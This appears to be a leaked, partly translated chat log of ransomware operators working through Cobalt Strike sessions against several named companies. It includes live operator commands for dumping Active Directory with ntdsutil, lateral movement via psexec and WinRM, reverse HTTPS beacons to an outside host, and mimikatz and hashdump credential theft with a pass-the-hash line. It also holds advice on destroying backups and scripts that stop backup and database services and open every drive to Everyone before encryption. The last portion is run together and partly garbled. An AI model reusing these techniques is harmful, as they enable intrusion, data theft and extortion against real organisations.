SERVICE_NAME: vss
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:30> shell sc \\CLINICDC start vss
[*] Tasked beacon to run: sc \\CLINICDC start vss
[+] host called home, sent: 54 bytes
[+] received output:
SERVICE_NAME: vss
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 53772
        FLAGS              :

Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:49> shell sc \\CLINICDC query vss
[*] Tasked beacon to run: sc \\CLINICDC query vss
[+] host called home, sent: 54 bytes
[+] received output:
SERVICE_NAME: vss
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```
qw.bat
```
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
```
```
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:10:53> shell wmic /node:CLINICDC process call create "cmd /c C:\qw.bat"
[*] Tasked beacon to run: wmic /node:CLINICDC process call create "cmd /c C:\qw.bat"
[+] host called home, sent: 89 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 56968;
        ReturnValue = 0;
};
```
Right now, well, look?
Let's not make predictions
there is no folder, something
do as I did, remotely of course ))
and then the DC does not pull into the Cobalt?
through ntds it's realistic to shoot if there is LA on the DC
@tl1 good, yes
so such computers that give `Destination host unreachable`, leave them alone?
```
Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
Ping from one host not responding; from all machines it is not responding, ok?
From another machine it may not respond; from "destination host not responding" from another machine it is not responding; from another host it says that the host you are requesting is not found.
```
beacon> shell ping NSTORE0.mcklrh.mig
[*] Tasked beacon to run: ping NSTORE0.mcklrh.mig
[+] host called home, sent: 54 bytes
[+] received output:

Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data:
Reply from 192.168.254.92: Destination host unreachable.
Reply from 192.168.254.92: Destination host unreachable.
Reply from 192.168.254.92: Destination host unreachable.

[+] received output:
Reply from 192.168.254.92: Destination host unreachable.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
beacon> shell dir \\192.168.254.110\C$
[*] Tasked beacon to run: dir \\192.168.254.110\C$
[+] host called home, sent: 55 bytes
[+] received output:
The network path was not found.
```
```
beacon> jump winrm 192.168.254.110
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_42) on 192.168.254.110 via WinRM
[+] host called home, sent: 194407 bytes
[-] Could not connect to pipe: 53
[+] received output:
#< CLIXML
[192.168.254.110] Connecting to remote server failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (:) [], PSRemotingTransportException
    + FullyQualifiedErrorId : PSSessionStateBroken

beacon> jump winrm 192.168.254.110 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via WinRM
[+] host called home, sent: 198121 bytes
[+] received output:
#< CLIXML
[192.168.254.110] Connecting to remote server failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (:) [], PSRemotingTransportException
    + FullyQualifiedErrorId : PSSessionStateBroken
```
```
beacon> jump psexec 192.168.254.110 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via Service Control Manager (\\192.168.254.110\ADMIN$\bd450eb.exe)
[+] host called home, sent: 287818 bytes
[-] could not upload file: 53
[-] Could not open service control manager on 192.168.254.110: 1722

beacon> jump psexec 192.168.254.110 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_42) on 192.168.254.110 via Service Control Manager (\\192.168.254.110\ADMIN$\05ebb47.exe)
[+] host called home, sent: 287872 bytes
[-] could not upload file: 53
[-] Could not open service control manager on 192.168.254.110: 1722
[-] Could not connect to pipe: 53
```
Give me the command and output the full output.
```
Reply from 192.168.254.92: Destination host unreachable.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
If it was resolved normally before, does that mean the host is offline? What should I do with it?
It's logical that no ping or https jump works
@tl1 If a host on a ping gives
```
Destination host unreachable
```
and when I ask for a dir
```
The network path was not found.
```
is it realistic to pull it in at all?
```
Msf::OptionValidateError One or more options failed to validate: RHOSTS.
```
here, its off status does not change in any way
@user3 where?
imho ms17 knocked in that domain :thinking:
checked the rights in that domain
and smb_login also did so
Probably, I understand: if by IP it pulls machines from the current domain on 1-2 hosts, not sure, but it is worth trying
in smb_login can you specify a hostname instead of an IP in rhosts?
so, and yet, try not \\10.5.50.192\ but \\audiology2.ffmg.local\
and maybe just ping the hostname? :thinking:
compare the results with the one from the vulnerable one, and from there ping another host from that domain
ping the one you want, and ping it through the one I showed you above.
```
[*] 10.5.50.192:445 - Output for "net localgroup administrators":
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
```
This was pulling
```
paulsanderson.ffmg.local [10.10.220.45] >operatingSystem: Windows XP Professional
```
it came up with this
```
Host Name:        LRH001240
OS Name:          Microsoft Windows 10 Pro
Registered Owner: lrhc

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
LRHC\Domain Admins
LRHC/Nessus Local Access
LRHC\Paragon_Users
```
Did you pull systeminfo off the machine? Is the hostname the one you pinged there? Is the domain name full? Give an example of an addendum; is it hostnames? How did you collect the IPs here?
```
@echo off
setlocal enabledelayedexpansion
set OUTPUT_FILE=result.txt
>nul copy nul %OUTPUT_FILE%
echo HOSTNAME,LONGNAME,IPADDRESS,STATE >%OUTPUT_FILE%
rem one address or name per line in ips.txt
for /f %%i in (ips.txt) do (
    set SERVER_ADDRESS_I=UNRESOLVED
    set SERVER_ADDRESS_L=UNRESOLVED
    rem "Pinging <name> [<ip>] ..." gives tokens 2 and 3; SERVER_IS_UP is echoed only when ping returns 0
    for /f "tokens=1,2,3" %%x in ('ping -n 1 -a %%i ^&^& echo SERVER_IS_UP') do (
        if %%x==Pinging set SERVER_ADDRESS_L=%%y
        if %%x==Pinging set SERVER_ADDRESS_I=%%z
        if %%x==SERVER_IS_UP (set SERVER_STATE=UP) else (set SERVER_STATE=DOWN)
    )
    echo %%i [!SERVER_ADDRESS_L::=!]
    echo %%i,!SERVER_ADDRESS_L::=!,!SERVER_ADDRESS_I::=!,!SERVER_STATE! >>%OUTPUT_FILE%
)
```
how did you ping the hosts from the trust?
I'm talking about it: are you in the trust domain?
although in the trust domain
10
ok
net systeminfo says there are 10 Windows, so net domain in them gives out the current domain
there is a suspicion that the machines in the current and trust domain match by IP, and therefore machines from the current domain are pulled
can smb_login take the hostname instead of the IP?
check also the processes, OS, AV
if not servers, then browsers
check more processes
some of them are not attracted, and those that are attracted have no creds at all
```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
[-] no results.

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```
user3
to and from the dedicated server
Copy not directly, load it through the Cobalt
in what, just clarifying.
the archiver will pass
in what, the problem?
KB
How to treat file download?
It is necessary to download an exe to download the archive from ff. Is there info?
I mean, it's worth a try, there is no alternative)
well, such ... not that "wildly" noisy
there are LA creds on one of the servers)
I want to run sharefinder, is it noisy?
leave it for half an hour
I know that you can pull browsers if it's ff)
there's still the sphere
We're not noisy yet, we're walking the net gently.
but without noise we can not get the creds from the sphere, so on the day of closing we'll have to look for the sphere at once)
~9 am, then it is more likely to allocate the morning
+ I am so, to be aware of this particular one, can move
the network is still not ready for closing
```
The current time at \\HJ-PRT-AZPROD.evo.local is 1/6/2021 8:54:24 AM
```
I think our default time to start at 03:00 here is not very suitable.
At 3 am it will be 16 days.
Yes, and the network is not as big
the admin there is vigilant, my respect
Maybe there are even runes against the evil eye on the system
That thing they have https://redcanary.com/
```
192.168.9.251:445 (platform: 500 version: 6.2 name: EPSON1BBE6E domain: WORKGROUP)
192.168.9.102:445 (platform: 500 version: 5.0 name: DOCKPRT domain: WORKGROUP)
192.168.9.138:445 (platform: 500 version: 4.9 name: DC_CRTV_NAS1 domain: WORKGROUP)
```
EPSON WF-3540 Series
https://www.promise.com/Policy
it also has a tendency to detect
refuse vmikai; as soon as you start, it will go back
report without the possibility to interrupt the process
just need to do it when no one is there; before closing you can make noise)
Prepare a network taka
how to get Codes then?)
kb most likely noticed by Golden Ticket
katintds, dxink us not to remove?
from the entry point under the vpn
S-1-5-21-2479520119-439608908-2710113943
user9
In the chat room I did not find it; unlikely to change there
krbtgt
golden ticket do iten
I remember you threw ntds?
can consult with colleagues while you have thoughts - do
The only thing that comes to mind: check through msf for holes... I have no experience with this situation (to raise the rights)
to what?
You have changed tasks while you work here, then do not validate
where to roll?
check on the DC
```
scanuser abc123$ - VALID FOR DC
```
work only from the entry point
Checked all the creds (I mean if you use ms17, depending on how you set it up, MSF also burns fast
Kb Right?
Yes, I checked folders.
folder? should have looked at the processes and ctrl+f cb.exe)
checked the wrong folder and jumped for joy (
try again; raise the rights, for nothing you then climb....
the passwords changed
+ Captured the sheet as you raise the load
give me a load
I'll give you a replacement, then we'll kick you out for 2 days maximum along with this one.
So they're looking for our entry point.
So they've worked off the Buy More...
EVO.LOCAL what's your cob...
EVO.LOCAL what's your domain?
Now I need credentials to connect to the vpn
Unlocked; that Sophos and OpenVPN are the same
user4
user1
please
@user1 here :zany_face:
and there's 6 hours there
seemed idle time 0 hours 50 minutes
stop
my guess they turned off the vpn for lunch; there the time is 01:43 PM
```
====== IdleTime ======
CurrentUser : NT AUTHORITY\SYSTEM
Idletime    : 06h:50m:34s:109ms (1234234109 milliseconds)
```
On the other computer TOSA is LA.
```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
```
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
```

I can't get to them on my desktop in browser, socks4 proxy only from my ip, as I understand it.
Then you need to look for configurations
Hours ago domain was responding, now it won't respond
Net-GPPPassword seems to be down

```
beacon> net domain
[*] Tasked beacon to run net domain
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 87853 bytes
[+] received output:
telecomlabsinc.com
[+] received output:
Domain Controllers:
[-] Error: 0

beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
TELECOMLABSINC\Domain Admins
TELECOMLABSINC\richards
TOSA
The command completed successfully.

beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain telecomlabsinc.com.
```
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
art.admin
chrisma.admin
daniel.admin
MSSQL
ServerAdmin$
sissel.admin
svc_cisco_ldap
The command completed successfully.

beacon> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain telecomlabsinc.com.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
chrisma.admin
daniel.admin
ServerAdmin$
The command completed successfully.
```

Good night, good night everybody, remember to ask and help each other and also go home, so as long as there are no questions
still 20 min
+ approached the passwords say sticky notes or something like that
tomorrow by 3
so you in the water check on the rdp their desktops for notes on it
2) if there are questions then ask
1) take the archive with builds so the password will pass
thanks)
not before 12 home, I hope you close one network at least)
Merry Christmas!
Merry Christmas to all!!!
Tomorrow by 3:30 work
pozapozavlya forgot that yesterday was a holiday
We merry Christmas to all)
pure koba!
mailsniper works through the same
Exchange administrator (i.e.
member of "Exchange Organization Administrators" or "Organization Management" group)
water path in the same network
+- Exchange Organization Management in EAC; the account with backup access should be in the group, in other cases under the tops are directors, chief accountants, etc.
If you can't back up everything, it could be that they just have their mail hosted, it's not that easy to download a backup, let me tell you about it.
if it's not internal, it's external
if there are no mail servers in the network, do we skip it?
in evo have not yet found and it seems that it is not tor
the main thing do not forget because in the account is stored information about the sessions, and you can obviously get there through the web
1 network 1 account can leave or every time a new registrar?
the question you take backups that way
maybe someone else read this dialogue today in #water-way
@user8 learned how to download fat files from the network a couple of things who do not know
i wait in the groups info from additional tasks as well
give out +1 cob in reserve, you will give 2 builds, if you reach the stage of closing you close at your discretion on reports and results in the confa
tomorrow I will not be, work independently on #waterway-com and on #rtpcompany-com finalize + additional tasks + if you remember about the additional tasks on the networks?
a couple of announcements so everyone distract yourselves
it's waterway
po rdp hooked up to harper and reading slack
#ballymoregroup-com
#evo-com
#waterway-com
#1-done-rtpcompany-com
+ so I understand we have 4 networks in operation?
:space_invader:
hello
Hi
Hi
Hi
When tomorrow from 9 I'll fuck Asya's head
ISP proboot already passed
How to do now go home
No, no access there at the moment.
chief warned that with the modems fucked?
This naebalovo how to pay would have turned off and all
And one was Yetavsky in which there was no sim, but it works in access to the lk tipo forgot
Modems were under simki
I did everything in my power, I'm not a magic fairy
and modems were flashed?
No five sim, I half a Sunday drove around different fuckers who sell allegedly with sim simki modems. Of the 6 did not work at any of them.
they in the spirit of all providers fuck up with the internet, and the fuck to count on them
I told him on Friday to buy 5 fucking modems and sims
Stalin: I have agreed to connect the morning. I paid all the bills on the eve. The manager forgot about us. Is there anything I can do? Computers also put not a complete set. Drove half a day assembled them. Some of the parts didn't work and I had to go and change them. Who do I need to talk to? I wrote the boss yesterday that the computers were messed up. Said it happens.
user3 had to provide you with the Internet in the morning, I still wrote him on Friday that you do? Now what do we do?
apparently with someone will talk
Internet bills all paid. We signed the contract. Tk a lot of customers were coming tomorrow. Said she had a working day until 6. Now we got through the whole day ignored. She did not come to connect the Internet. With the manager agreed to the morning. Computers put.
Hi
10

```
SCCY-DC.sccy.local
TS.sccy.local
SCCY-FS.sccy.local
```

http://10.0.0.4:5000/webman/login.cgi?enable_syno_token=yes
setg Proxies socks4:209.222.101.167:1488
but they're sly foxes, yes, there's been a fortune in it... and there's like a ntds taken down...
https://connect.globaltranz.com/login?redir=%2Fng
the first 3 are just not available?
the first 2 seem to have got encrypted today, in the last one where it was allowed to go in and wiped the rest too?

```
beacon> shell dir \\dcwas79.Wilsonart.com\D$
[*] Tasked beacon to run: dir \\dcwas79.Wilsonart.com\D$
[+] host called home, sent: 61 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell dir \\dcveeam01.Wilsonart.com\F$
[*] Tasked beacon to run: dir \\dcveeam01.Wilsonart.com\F$
[+] host called home, sent: 63 bytes
[+] received output:
The network path was not found.
```

```
beacon> shell dir \\bod01-bkp01.eu.Wilsonart.com\F$
[*] Tasked beacon to run: dir \\bod01-bkp01.eu.Wilsonart.com\F$
[+] host called home, sent: 68 bytes
[+] received output:
The network path was not found.
```

`nas_signature.polyrey.net` this one was wiped through the web face

```
beacon> shell dir \\BBDC03.bushboard.co.uk\C$
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\C$
[+] host called home, sent: 62 bytes
[+] received output:
The network path was not found.
```

That's how the slf.local fell off, they were pulled in.

```
beacon> shell dir \\192.168.3.8\C$\readme.txt
[*] Tasked beacon to run: dir \\192.168.3.8\C$\readme.txt
[+] received output:
The specified network name is no longer available.
```

```
beacon> shell dir \\192.168.3.7\C$\readme.txt
[*] Tasked beacon to run: dir \\192.168.3.7\C$\readme.txt
[+] host called home, sent: 62 bytes
[+] received output:
The specified network name is no longer available.
```

and give me a full hell of a lot more info from all domains
that way 2-3 files from file servers and backups will be enough
then i'm waiting for listings
now the exe file on armas was released on the rest of the drives in this domain only
dk came from somewhere else?
yeah, now even the buck will not let in
earlier i came in where there is no buck will not let in

```
Share name                 Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                     Disk           Remote Admin
Bushboard Backups          Disk
C$                         Disk           Default share
E$                         Disk           Default share
F$                         Disk           Default share
IPC$                       IPC            Remote IPC
iTop-2.6.1-4463            Disk
log                        Disk
SQL_Server                 Disk
U$                         Disk           Default share
UpdateServicesPackages     Disk           A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
VBRCatalog                 Disk
vCenterBackups             Disk
WsusContent                Disk           A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp                   Disk           A networ
```

not all of the shares
didn't let me in? where did it let me in - erasing bushboard backups didn't touch it
so dir \\host\share\* /s > out.txt
+ can take backups file structures then specify info about it somewhere
not let me in under DA
not all domains are alive
I couldn't tell you, did the sharing scheme work?
i can't tell where it's not - i'm getting to some of the files that have been uploaded, they all crashed out at once
arms now i'm checking
stats are up
what about arms? they say you have 2-3 servers that are not working?
1.done.wilsonart.com
ok, from the neighboring try not checked, but it is better not to try, I do not know how the locker injected into one pid in two variants in general behaves
and so not from a separate session can?
*trash backup files are hard to restore and damaged easily enough ...
but after rm it's better to dump the garbage anyway free space if you are already switched off to sleep and everything else is done - you can rm too =)so can rm ?)so you can dump the backups any way you want and don't want to get damaged without restoring them, because if they get a decryptor they will in any case restore the workstations and servers in their last state or use -nomutex flag from a "separate" sessionbut for that it is better to slow down the current process of blockingmay try right now by adding the path flag and -size 15 for example to corrupt 15% of files in the directory where backups are kept theoretically, you can set a locker on backups with -size flag to reduce corruptions percentage for speed reasons- even 10% is not enough- backups are encrypted for a long time- check hosts where sessions are dead after lock process start check and if all ok, go have a rest- so, if everything is started, 20 minutes asleep, have some breakfast and in 20 minutes do control check re-piping all hosts, see if new hosts have not declared, if the process is running correctly on all where it was started if there is huge data - and it will take a long time to do - delete what has not had time to crypto appear to them all fine, please check the files snapshots latching by hand snapshots in the sphere and did not happen) the server where snapshots were stored is locked by crypt is there a rdmi/snapshots deleted/encrypted? virtualization was found - snapshots were taken and flown to a backup on a win-server nasa was accessed, their disks were primed. 
backups were stored on vin servers superficially watching the case, tell me what is it with backups/nas/virtualization wait 20-30 minutes and do a manual check on all servers and armas about the re-injection got it the files just didn't show up ``` if a session did not die after the first injection, probably there is a file queue and you should be patient it means a segment delimitation with Cisk as the fv playing the role of re-injection the files didn't show up so you're trying to ping the host titty ``` who's that? ciscar? or isis? Bottom line: Wilsonart.com. srv: 125 (3 disks/nixes) / 128 arm: shared disks uk.Wilsonart.com srv: 22 / 22 arm: 44 / 44 eu.Wilsonart.com srv: 36 / 36 arm: 2 / 2 cn.Wilsonart.com srv: 1 / 1 WI.RWP.COM. srv: 27 / 31 (1 was not approached by admins, two did not have 445, 1 was not wind) arm: unshared SLF.LOCAL srv: 8 / 8 arm: 6 / 8 (repping occurred) resopal.lan srv: 26 arm: all shared ralpwilson.com srv: 1 / 1 polyrey.net srv: 52 / 53 (1 was not approached by admins) arm: 28 masked BUSHBOARD.CO.UK srv: 10 / 10 arm: 17 mashed up arborite.com srv: 9 / 9 arm: all armas are shared ``This could have unpredictable effects on file recovery if the flagwot is not written in time. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. ``This is not the way to do it. i see on some of the sessions, i'll prepare the status, everything works, then da mount yes run at once on this 2003 no vu some awful there is also e meets in this griddiskonnect incidentally often almost instantaneous and there were only C-drives? no more? 
well, will have to re-mount) there are many in the domains do not stretch this in the same domain `` `` Status Local Remote Network ------------------------------------------------------------------------------- Disconnected L: \170.7.122.153\c$ Microsoft Windows Network Disconnected M: \170.7.25.7\c$ Microsoft Windows Network Disconnected N: \170.7.34.75\c$ Microsoft Windows Network Disconnected O: \170.7.38.21\c$ Microsoft Windows Network Disconnected P: \170.7.9.19\c$ Microsoft Windows Network Disconnected Q: \170.7.183.5\c$ Microsoft Windows Network Disconnected R: \170.7.5.11\c$ Microsoft Windows Network Disconnected S: \170.7.24.25\c$ Microsoft Windows Network Disconnected T: \170.7.123.166$ Microsoft Windows Network Disconnected U: \170.7.76.123$ Microsoft Windows Network Disconnected V: \170.7.121.129$ Microsoft Windows Network Disconnected W: \170.7.183.97\c$ Microsoft Windows Network Disconnected X: \170.7.183.84\c$ Microsoft Windows Network Disconnected Y: \170.7.123.168$ Microsoft Windows Network Disconnected Z: \170.7.123.224$ Microsoft Windows Network ``` :zany_face:what about the others? `` 170.7.20.230:445 170.7.2.30 not 445 here 170.7.110.205. 
170.7.44.212:445 (platform: 500 version: 5.2 name: TNTAS03 domain: WI) then in the dry residue look at those that do not have enough rights to if we miss something - it is not fatal, but the lock should already begin, let die those hosts that are attracted and lured so Tell me for all the domains what statistics and how many not attracted or not muzzled 172.22.190.10 172.22.190.11 10.40.60.50 ``I'm already confused by the name of this nor170.7.2.30 this nor170.7.44.212:445a ping -a gave out this namewi.rwp.comnu the domain name so it means they are in a WI domain of some kind``` TNTAS03.WI.RWP.COM hqtov02.WI.RWP.COM `````` Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:55:00> shell net use * \\172.25.168.150\C$ [*] Tasked beacon to run: net use *\\\172.25.168.150\C$ [+] host called home, sent: 60 bytes [+] received output: Le mot de passe n'est pas valide pour \\172.25.168.150\C$. Entrez le nom d'utilisateur de '172.25.168.150': ``` i tried with different tokens, no one is good with this dnshostname. as long as they are domain hosts, they should not be in adc, they are not in adcom, tntas01 / tntas02hqtov01 maybe there```. hqtov02.rwp.com [170.7.2.30] tntas03.rwp.com [170.7.44.212] ``Look who the admins are there, I don't know... they have neighbors with the same hostname that the admins don't pass two or more `` 170.7.20.198 170.7.14.22 170.7.120.225 170.7.20.103 172.25.168.89 ``This four do with them[ ](https://mediaeveryone.com/group/wilsonart-com?msg=8qFm4k6XxFM8ZoxQJ) well exactly 170.7.20.230:443 Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:49:56> shell net use *\\172.25.170.69\C$ [*] Tasked beacon to run: net use *\\\172.25.170.69\C$ [+] host called home, sent: 59 bytes [+] received output: L'erreur système 53 s'est produite. Le chemin réseau n'a pas été trouvé. ``` There's no 170.7.110.205 in Tatar at all, it's 445. 
170.7.20.230:445 `````` there is no such subnet here as admins, but only in another one in the main domain, the LA did not come through from there ``` have you tried the enterprise? is everything pulled up/administered? or are there any problems as well? i see, how are the others doing? these two do not connect to cmblogin, the first one is not in ad_compact ``` fltov02.rwp.com [170.7.20.230] hqtas28.wilsonart.com [170.7.110.205] ``` here didn't pass as YES admins, and this subnet is only in another one in the main domain, LA didn't pass from there ``` hqtov02.rwp.com [170.7.2.30] tntas03.rwp.com [170.7.44.212] ``pth resopal.lan\admig 4654a6461da41310e51da91aaa7011da including local admin to re-check the kredna pack the rest can smb_login the other ones? or just from another point? the rest have pulled up on these while I am going through `` 170.7.20.230 - 170.7.2.30 - 170.7.110.205 - 170.7.44.212 - ```Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf37093fda2e2d172732487707cd31::: 170.7.5.* for example i would try the server local admin from servers which are in the same subnet how many you have left? maybe under the other will be under this yes no kayfiz under yes no right such things you just don't have rights to the ones you can't open. [-] could not open \170.7.20.230\c$*: [-] could not open \170.7.5.75\c$*: [-] could not open \170.7.2.30\c$*: [-] could not open \170.7.5.10\c$*: [-] could not open \170.7.76.123\c$*: [-] could not open \170.7.5.11\c$*: [-] could not open \170.7.110.205\$*: [+] established link to child beacon: 170.7.110.16 [+] established link to child beacon: 170.7.10.204 [+] established link to child beacon: 170.7.41.213 [-] could not open \170.7.44.212.{\c$\*:because it's not finished yet for these binary binary generated by bind pipes, artifact doesn't work while it doesn't work under swtz, but it's about service creation (only if it's not done) @tl2 don't you just use new artifact? 
170.7.41.214 - 170.7.55.114 - 170.7.20.230 - 170.7.5.75 - 170.7.2.30 - 170.7.5.10 - 170.7.76.123 - 170.7.5.11 - 170.7.110.205 - 170.7.110.16 - 170.7.10.204 - 170.7.41.213 - 170.7.44.212 - `````` beacon> jump psexec 170.7.5.10 smb [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.5.10 via Service Control Manager (\\170.7.5.10\ADMIN$\56b5cb5.exe) [+] host called home, sent: 287642 bytes [-] could not upload file: 5 [-] Could not open service control manager on 170.7.5.10: 5 [-] Could not connect to pipe: 2 which didn't connect, don't make a screenshot, make a list of hosts i had an error with the same host i don't know what to say :-)look at my log 1908 from which pead? everything works...well... [beacon> jump psexec 170.7.41.214 smb [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.41.214 via Service Control Manager (\170.7.41.214\ADMIN$\16e208c.exe) [+] host called home, sent: 287736 bytes [+] received output: Started service 16e208c on 170.7.41.214 [+] established link to child beacon: 170.7.41.214 That's what I meant about the disk ball ``` C:/Windows\system32\net1 stop samss /y C:Windows\system32/net1 stop veeamcatalogsvc /y C:Windows\system32/net1 stop veeamcloudsvc /y C:Windows\system32/net1 stop veeamdeploysvc /y C:Windows\System32/net.exe stop samss /y C:Windows\System32/net.exe stop veeamcatalogsvc /y C:Windows\System32/net.exe stop veeamcloudsvc /y C:Windows\System32/net.exe stop veeamdeploysvc /y C:³Windows\System32\taskkill.exe /IM sqlbrowser.exe /F C:Windows\System32\taskkill.exe /IM sqlceip.exe /F C:{Windows\System32\taskkill.exe /IM sqlservr.exe /F C:{Windows\System32\taskkill.exe /IM sqlwriter.exe /F C:{Windows\System32\taskkill.exe /IM veeam.backup.agent.configurations.exe /F C:\Windows\System32\taskkill.exe /IM veeam.backup.brokerservice.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.catalogdataservice.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.cloudservice.exe /F 
C:³Windows\System32\taskkill.exe /IM veeam.backup.externalinfrastructure.dbprovider.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.manager.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.mountservice.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.service.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.uiserver.exe /F C:Windows\System32\taskkill.exe /IM veeam.backup.wmiserver.exe /F C:{Windows\System32\taskkill.exe /IM veeamdeploymentsvc.exe /F C:{Windows\System32\taskkill.exe /IM veeamfilesysvsssvc.exe /F C:\Windows\System32\taskkill.exe /IM veeam.guest.interaction.proxy.exe /F C:\Windows\System32\taskkill.exe /IM veeamnfssvc.exe /F C:³Windows\System32\taskkill.exe /IM veeamtransportsvc.exe /F C:{Windows\system32\taskmgr.exe /4 C:\Windows\system32\wbem\wmiprvse.exe -Embedding C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding net share c=c: /grant:everyone,full net share d=d: /grant:everyone,full net share e=e: /grant:everyone,full net share f=f: /grant:everyone,full net share g=g: /grant:everyone,full net share h=h: /grant:everyone,full net share i=i: /grant:everyone,full net share j=j: /grant:everyone,full net share k=k: /grant:everyone,full net share l=l: /grant:everyone,full net share m=m: /grant:everyone,full net share n=n: /grant:everyone,full net share o=o: /grant:everyone,full net share p=p: /grant:everyone,full net share q=q: /grant:everyone,full net share r=r: /grant:everyone,full net share s=s: /grant:everyone,full net share t=t: /grant:everyone,full net share u=u: /grant:everyone,full net share w=w: /grant:everyone,full net share v=v: /grant:everyone,full net share x=x: /grant:everyone,full net share y=y: /grant:everyone,full net share z=z: /grant:everyone,full icacls C:\* /grant Everyone:F /T /C /Q icacls D:\* /grant Everyone:F /T /C /Q icacls E:\* /grant Everyone:F /T /C /Q icacls F:\* /grant Everyone:F /T /C /Q icacls G:\* /grant Everyone:F /T /C /Q icacls H:\* /grant Everyone:F /T /C /Q icacls I:\* /grant 
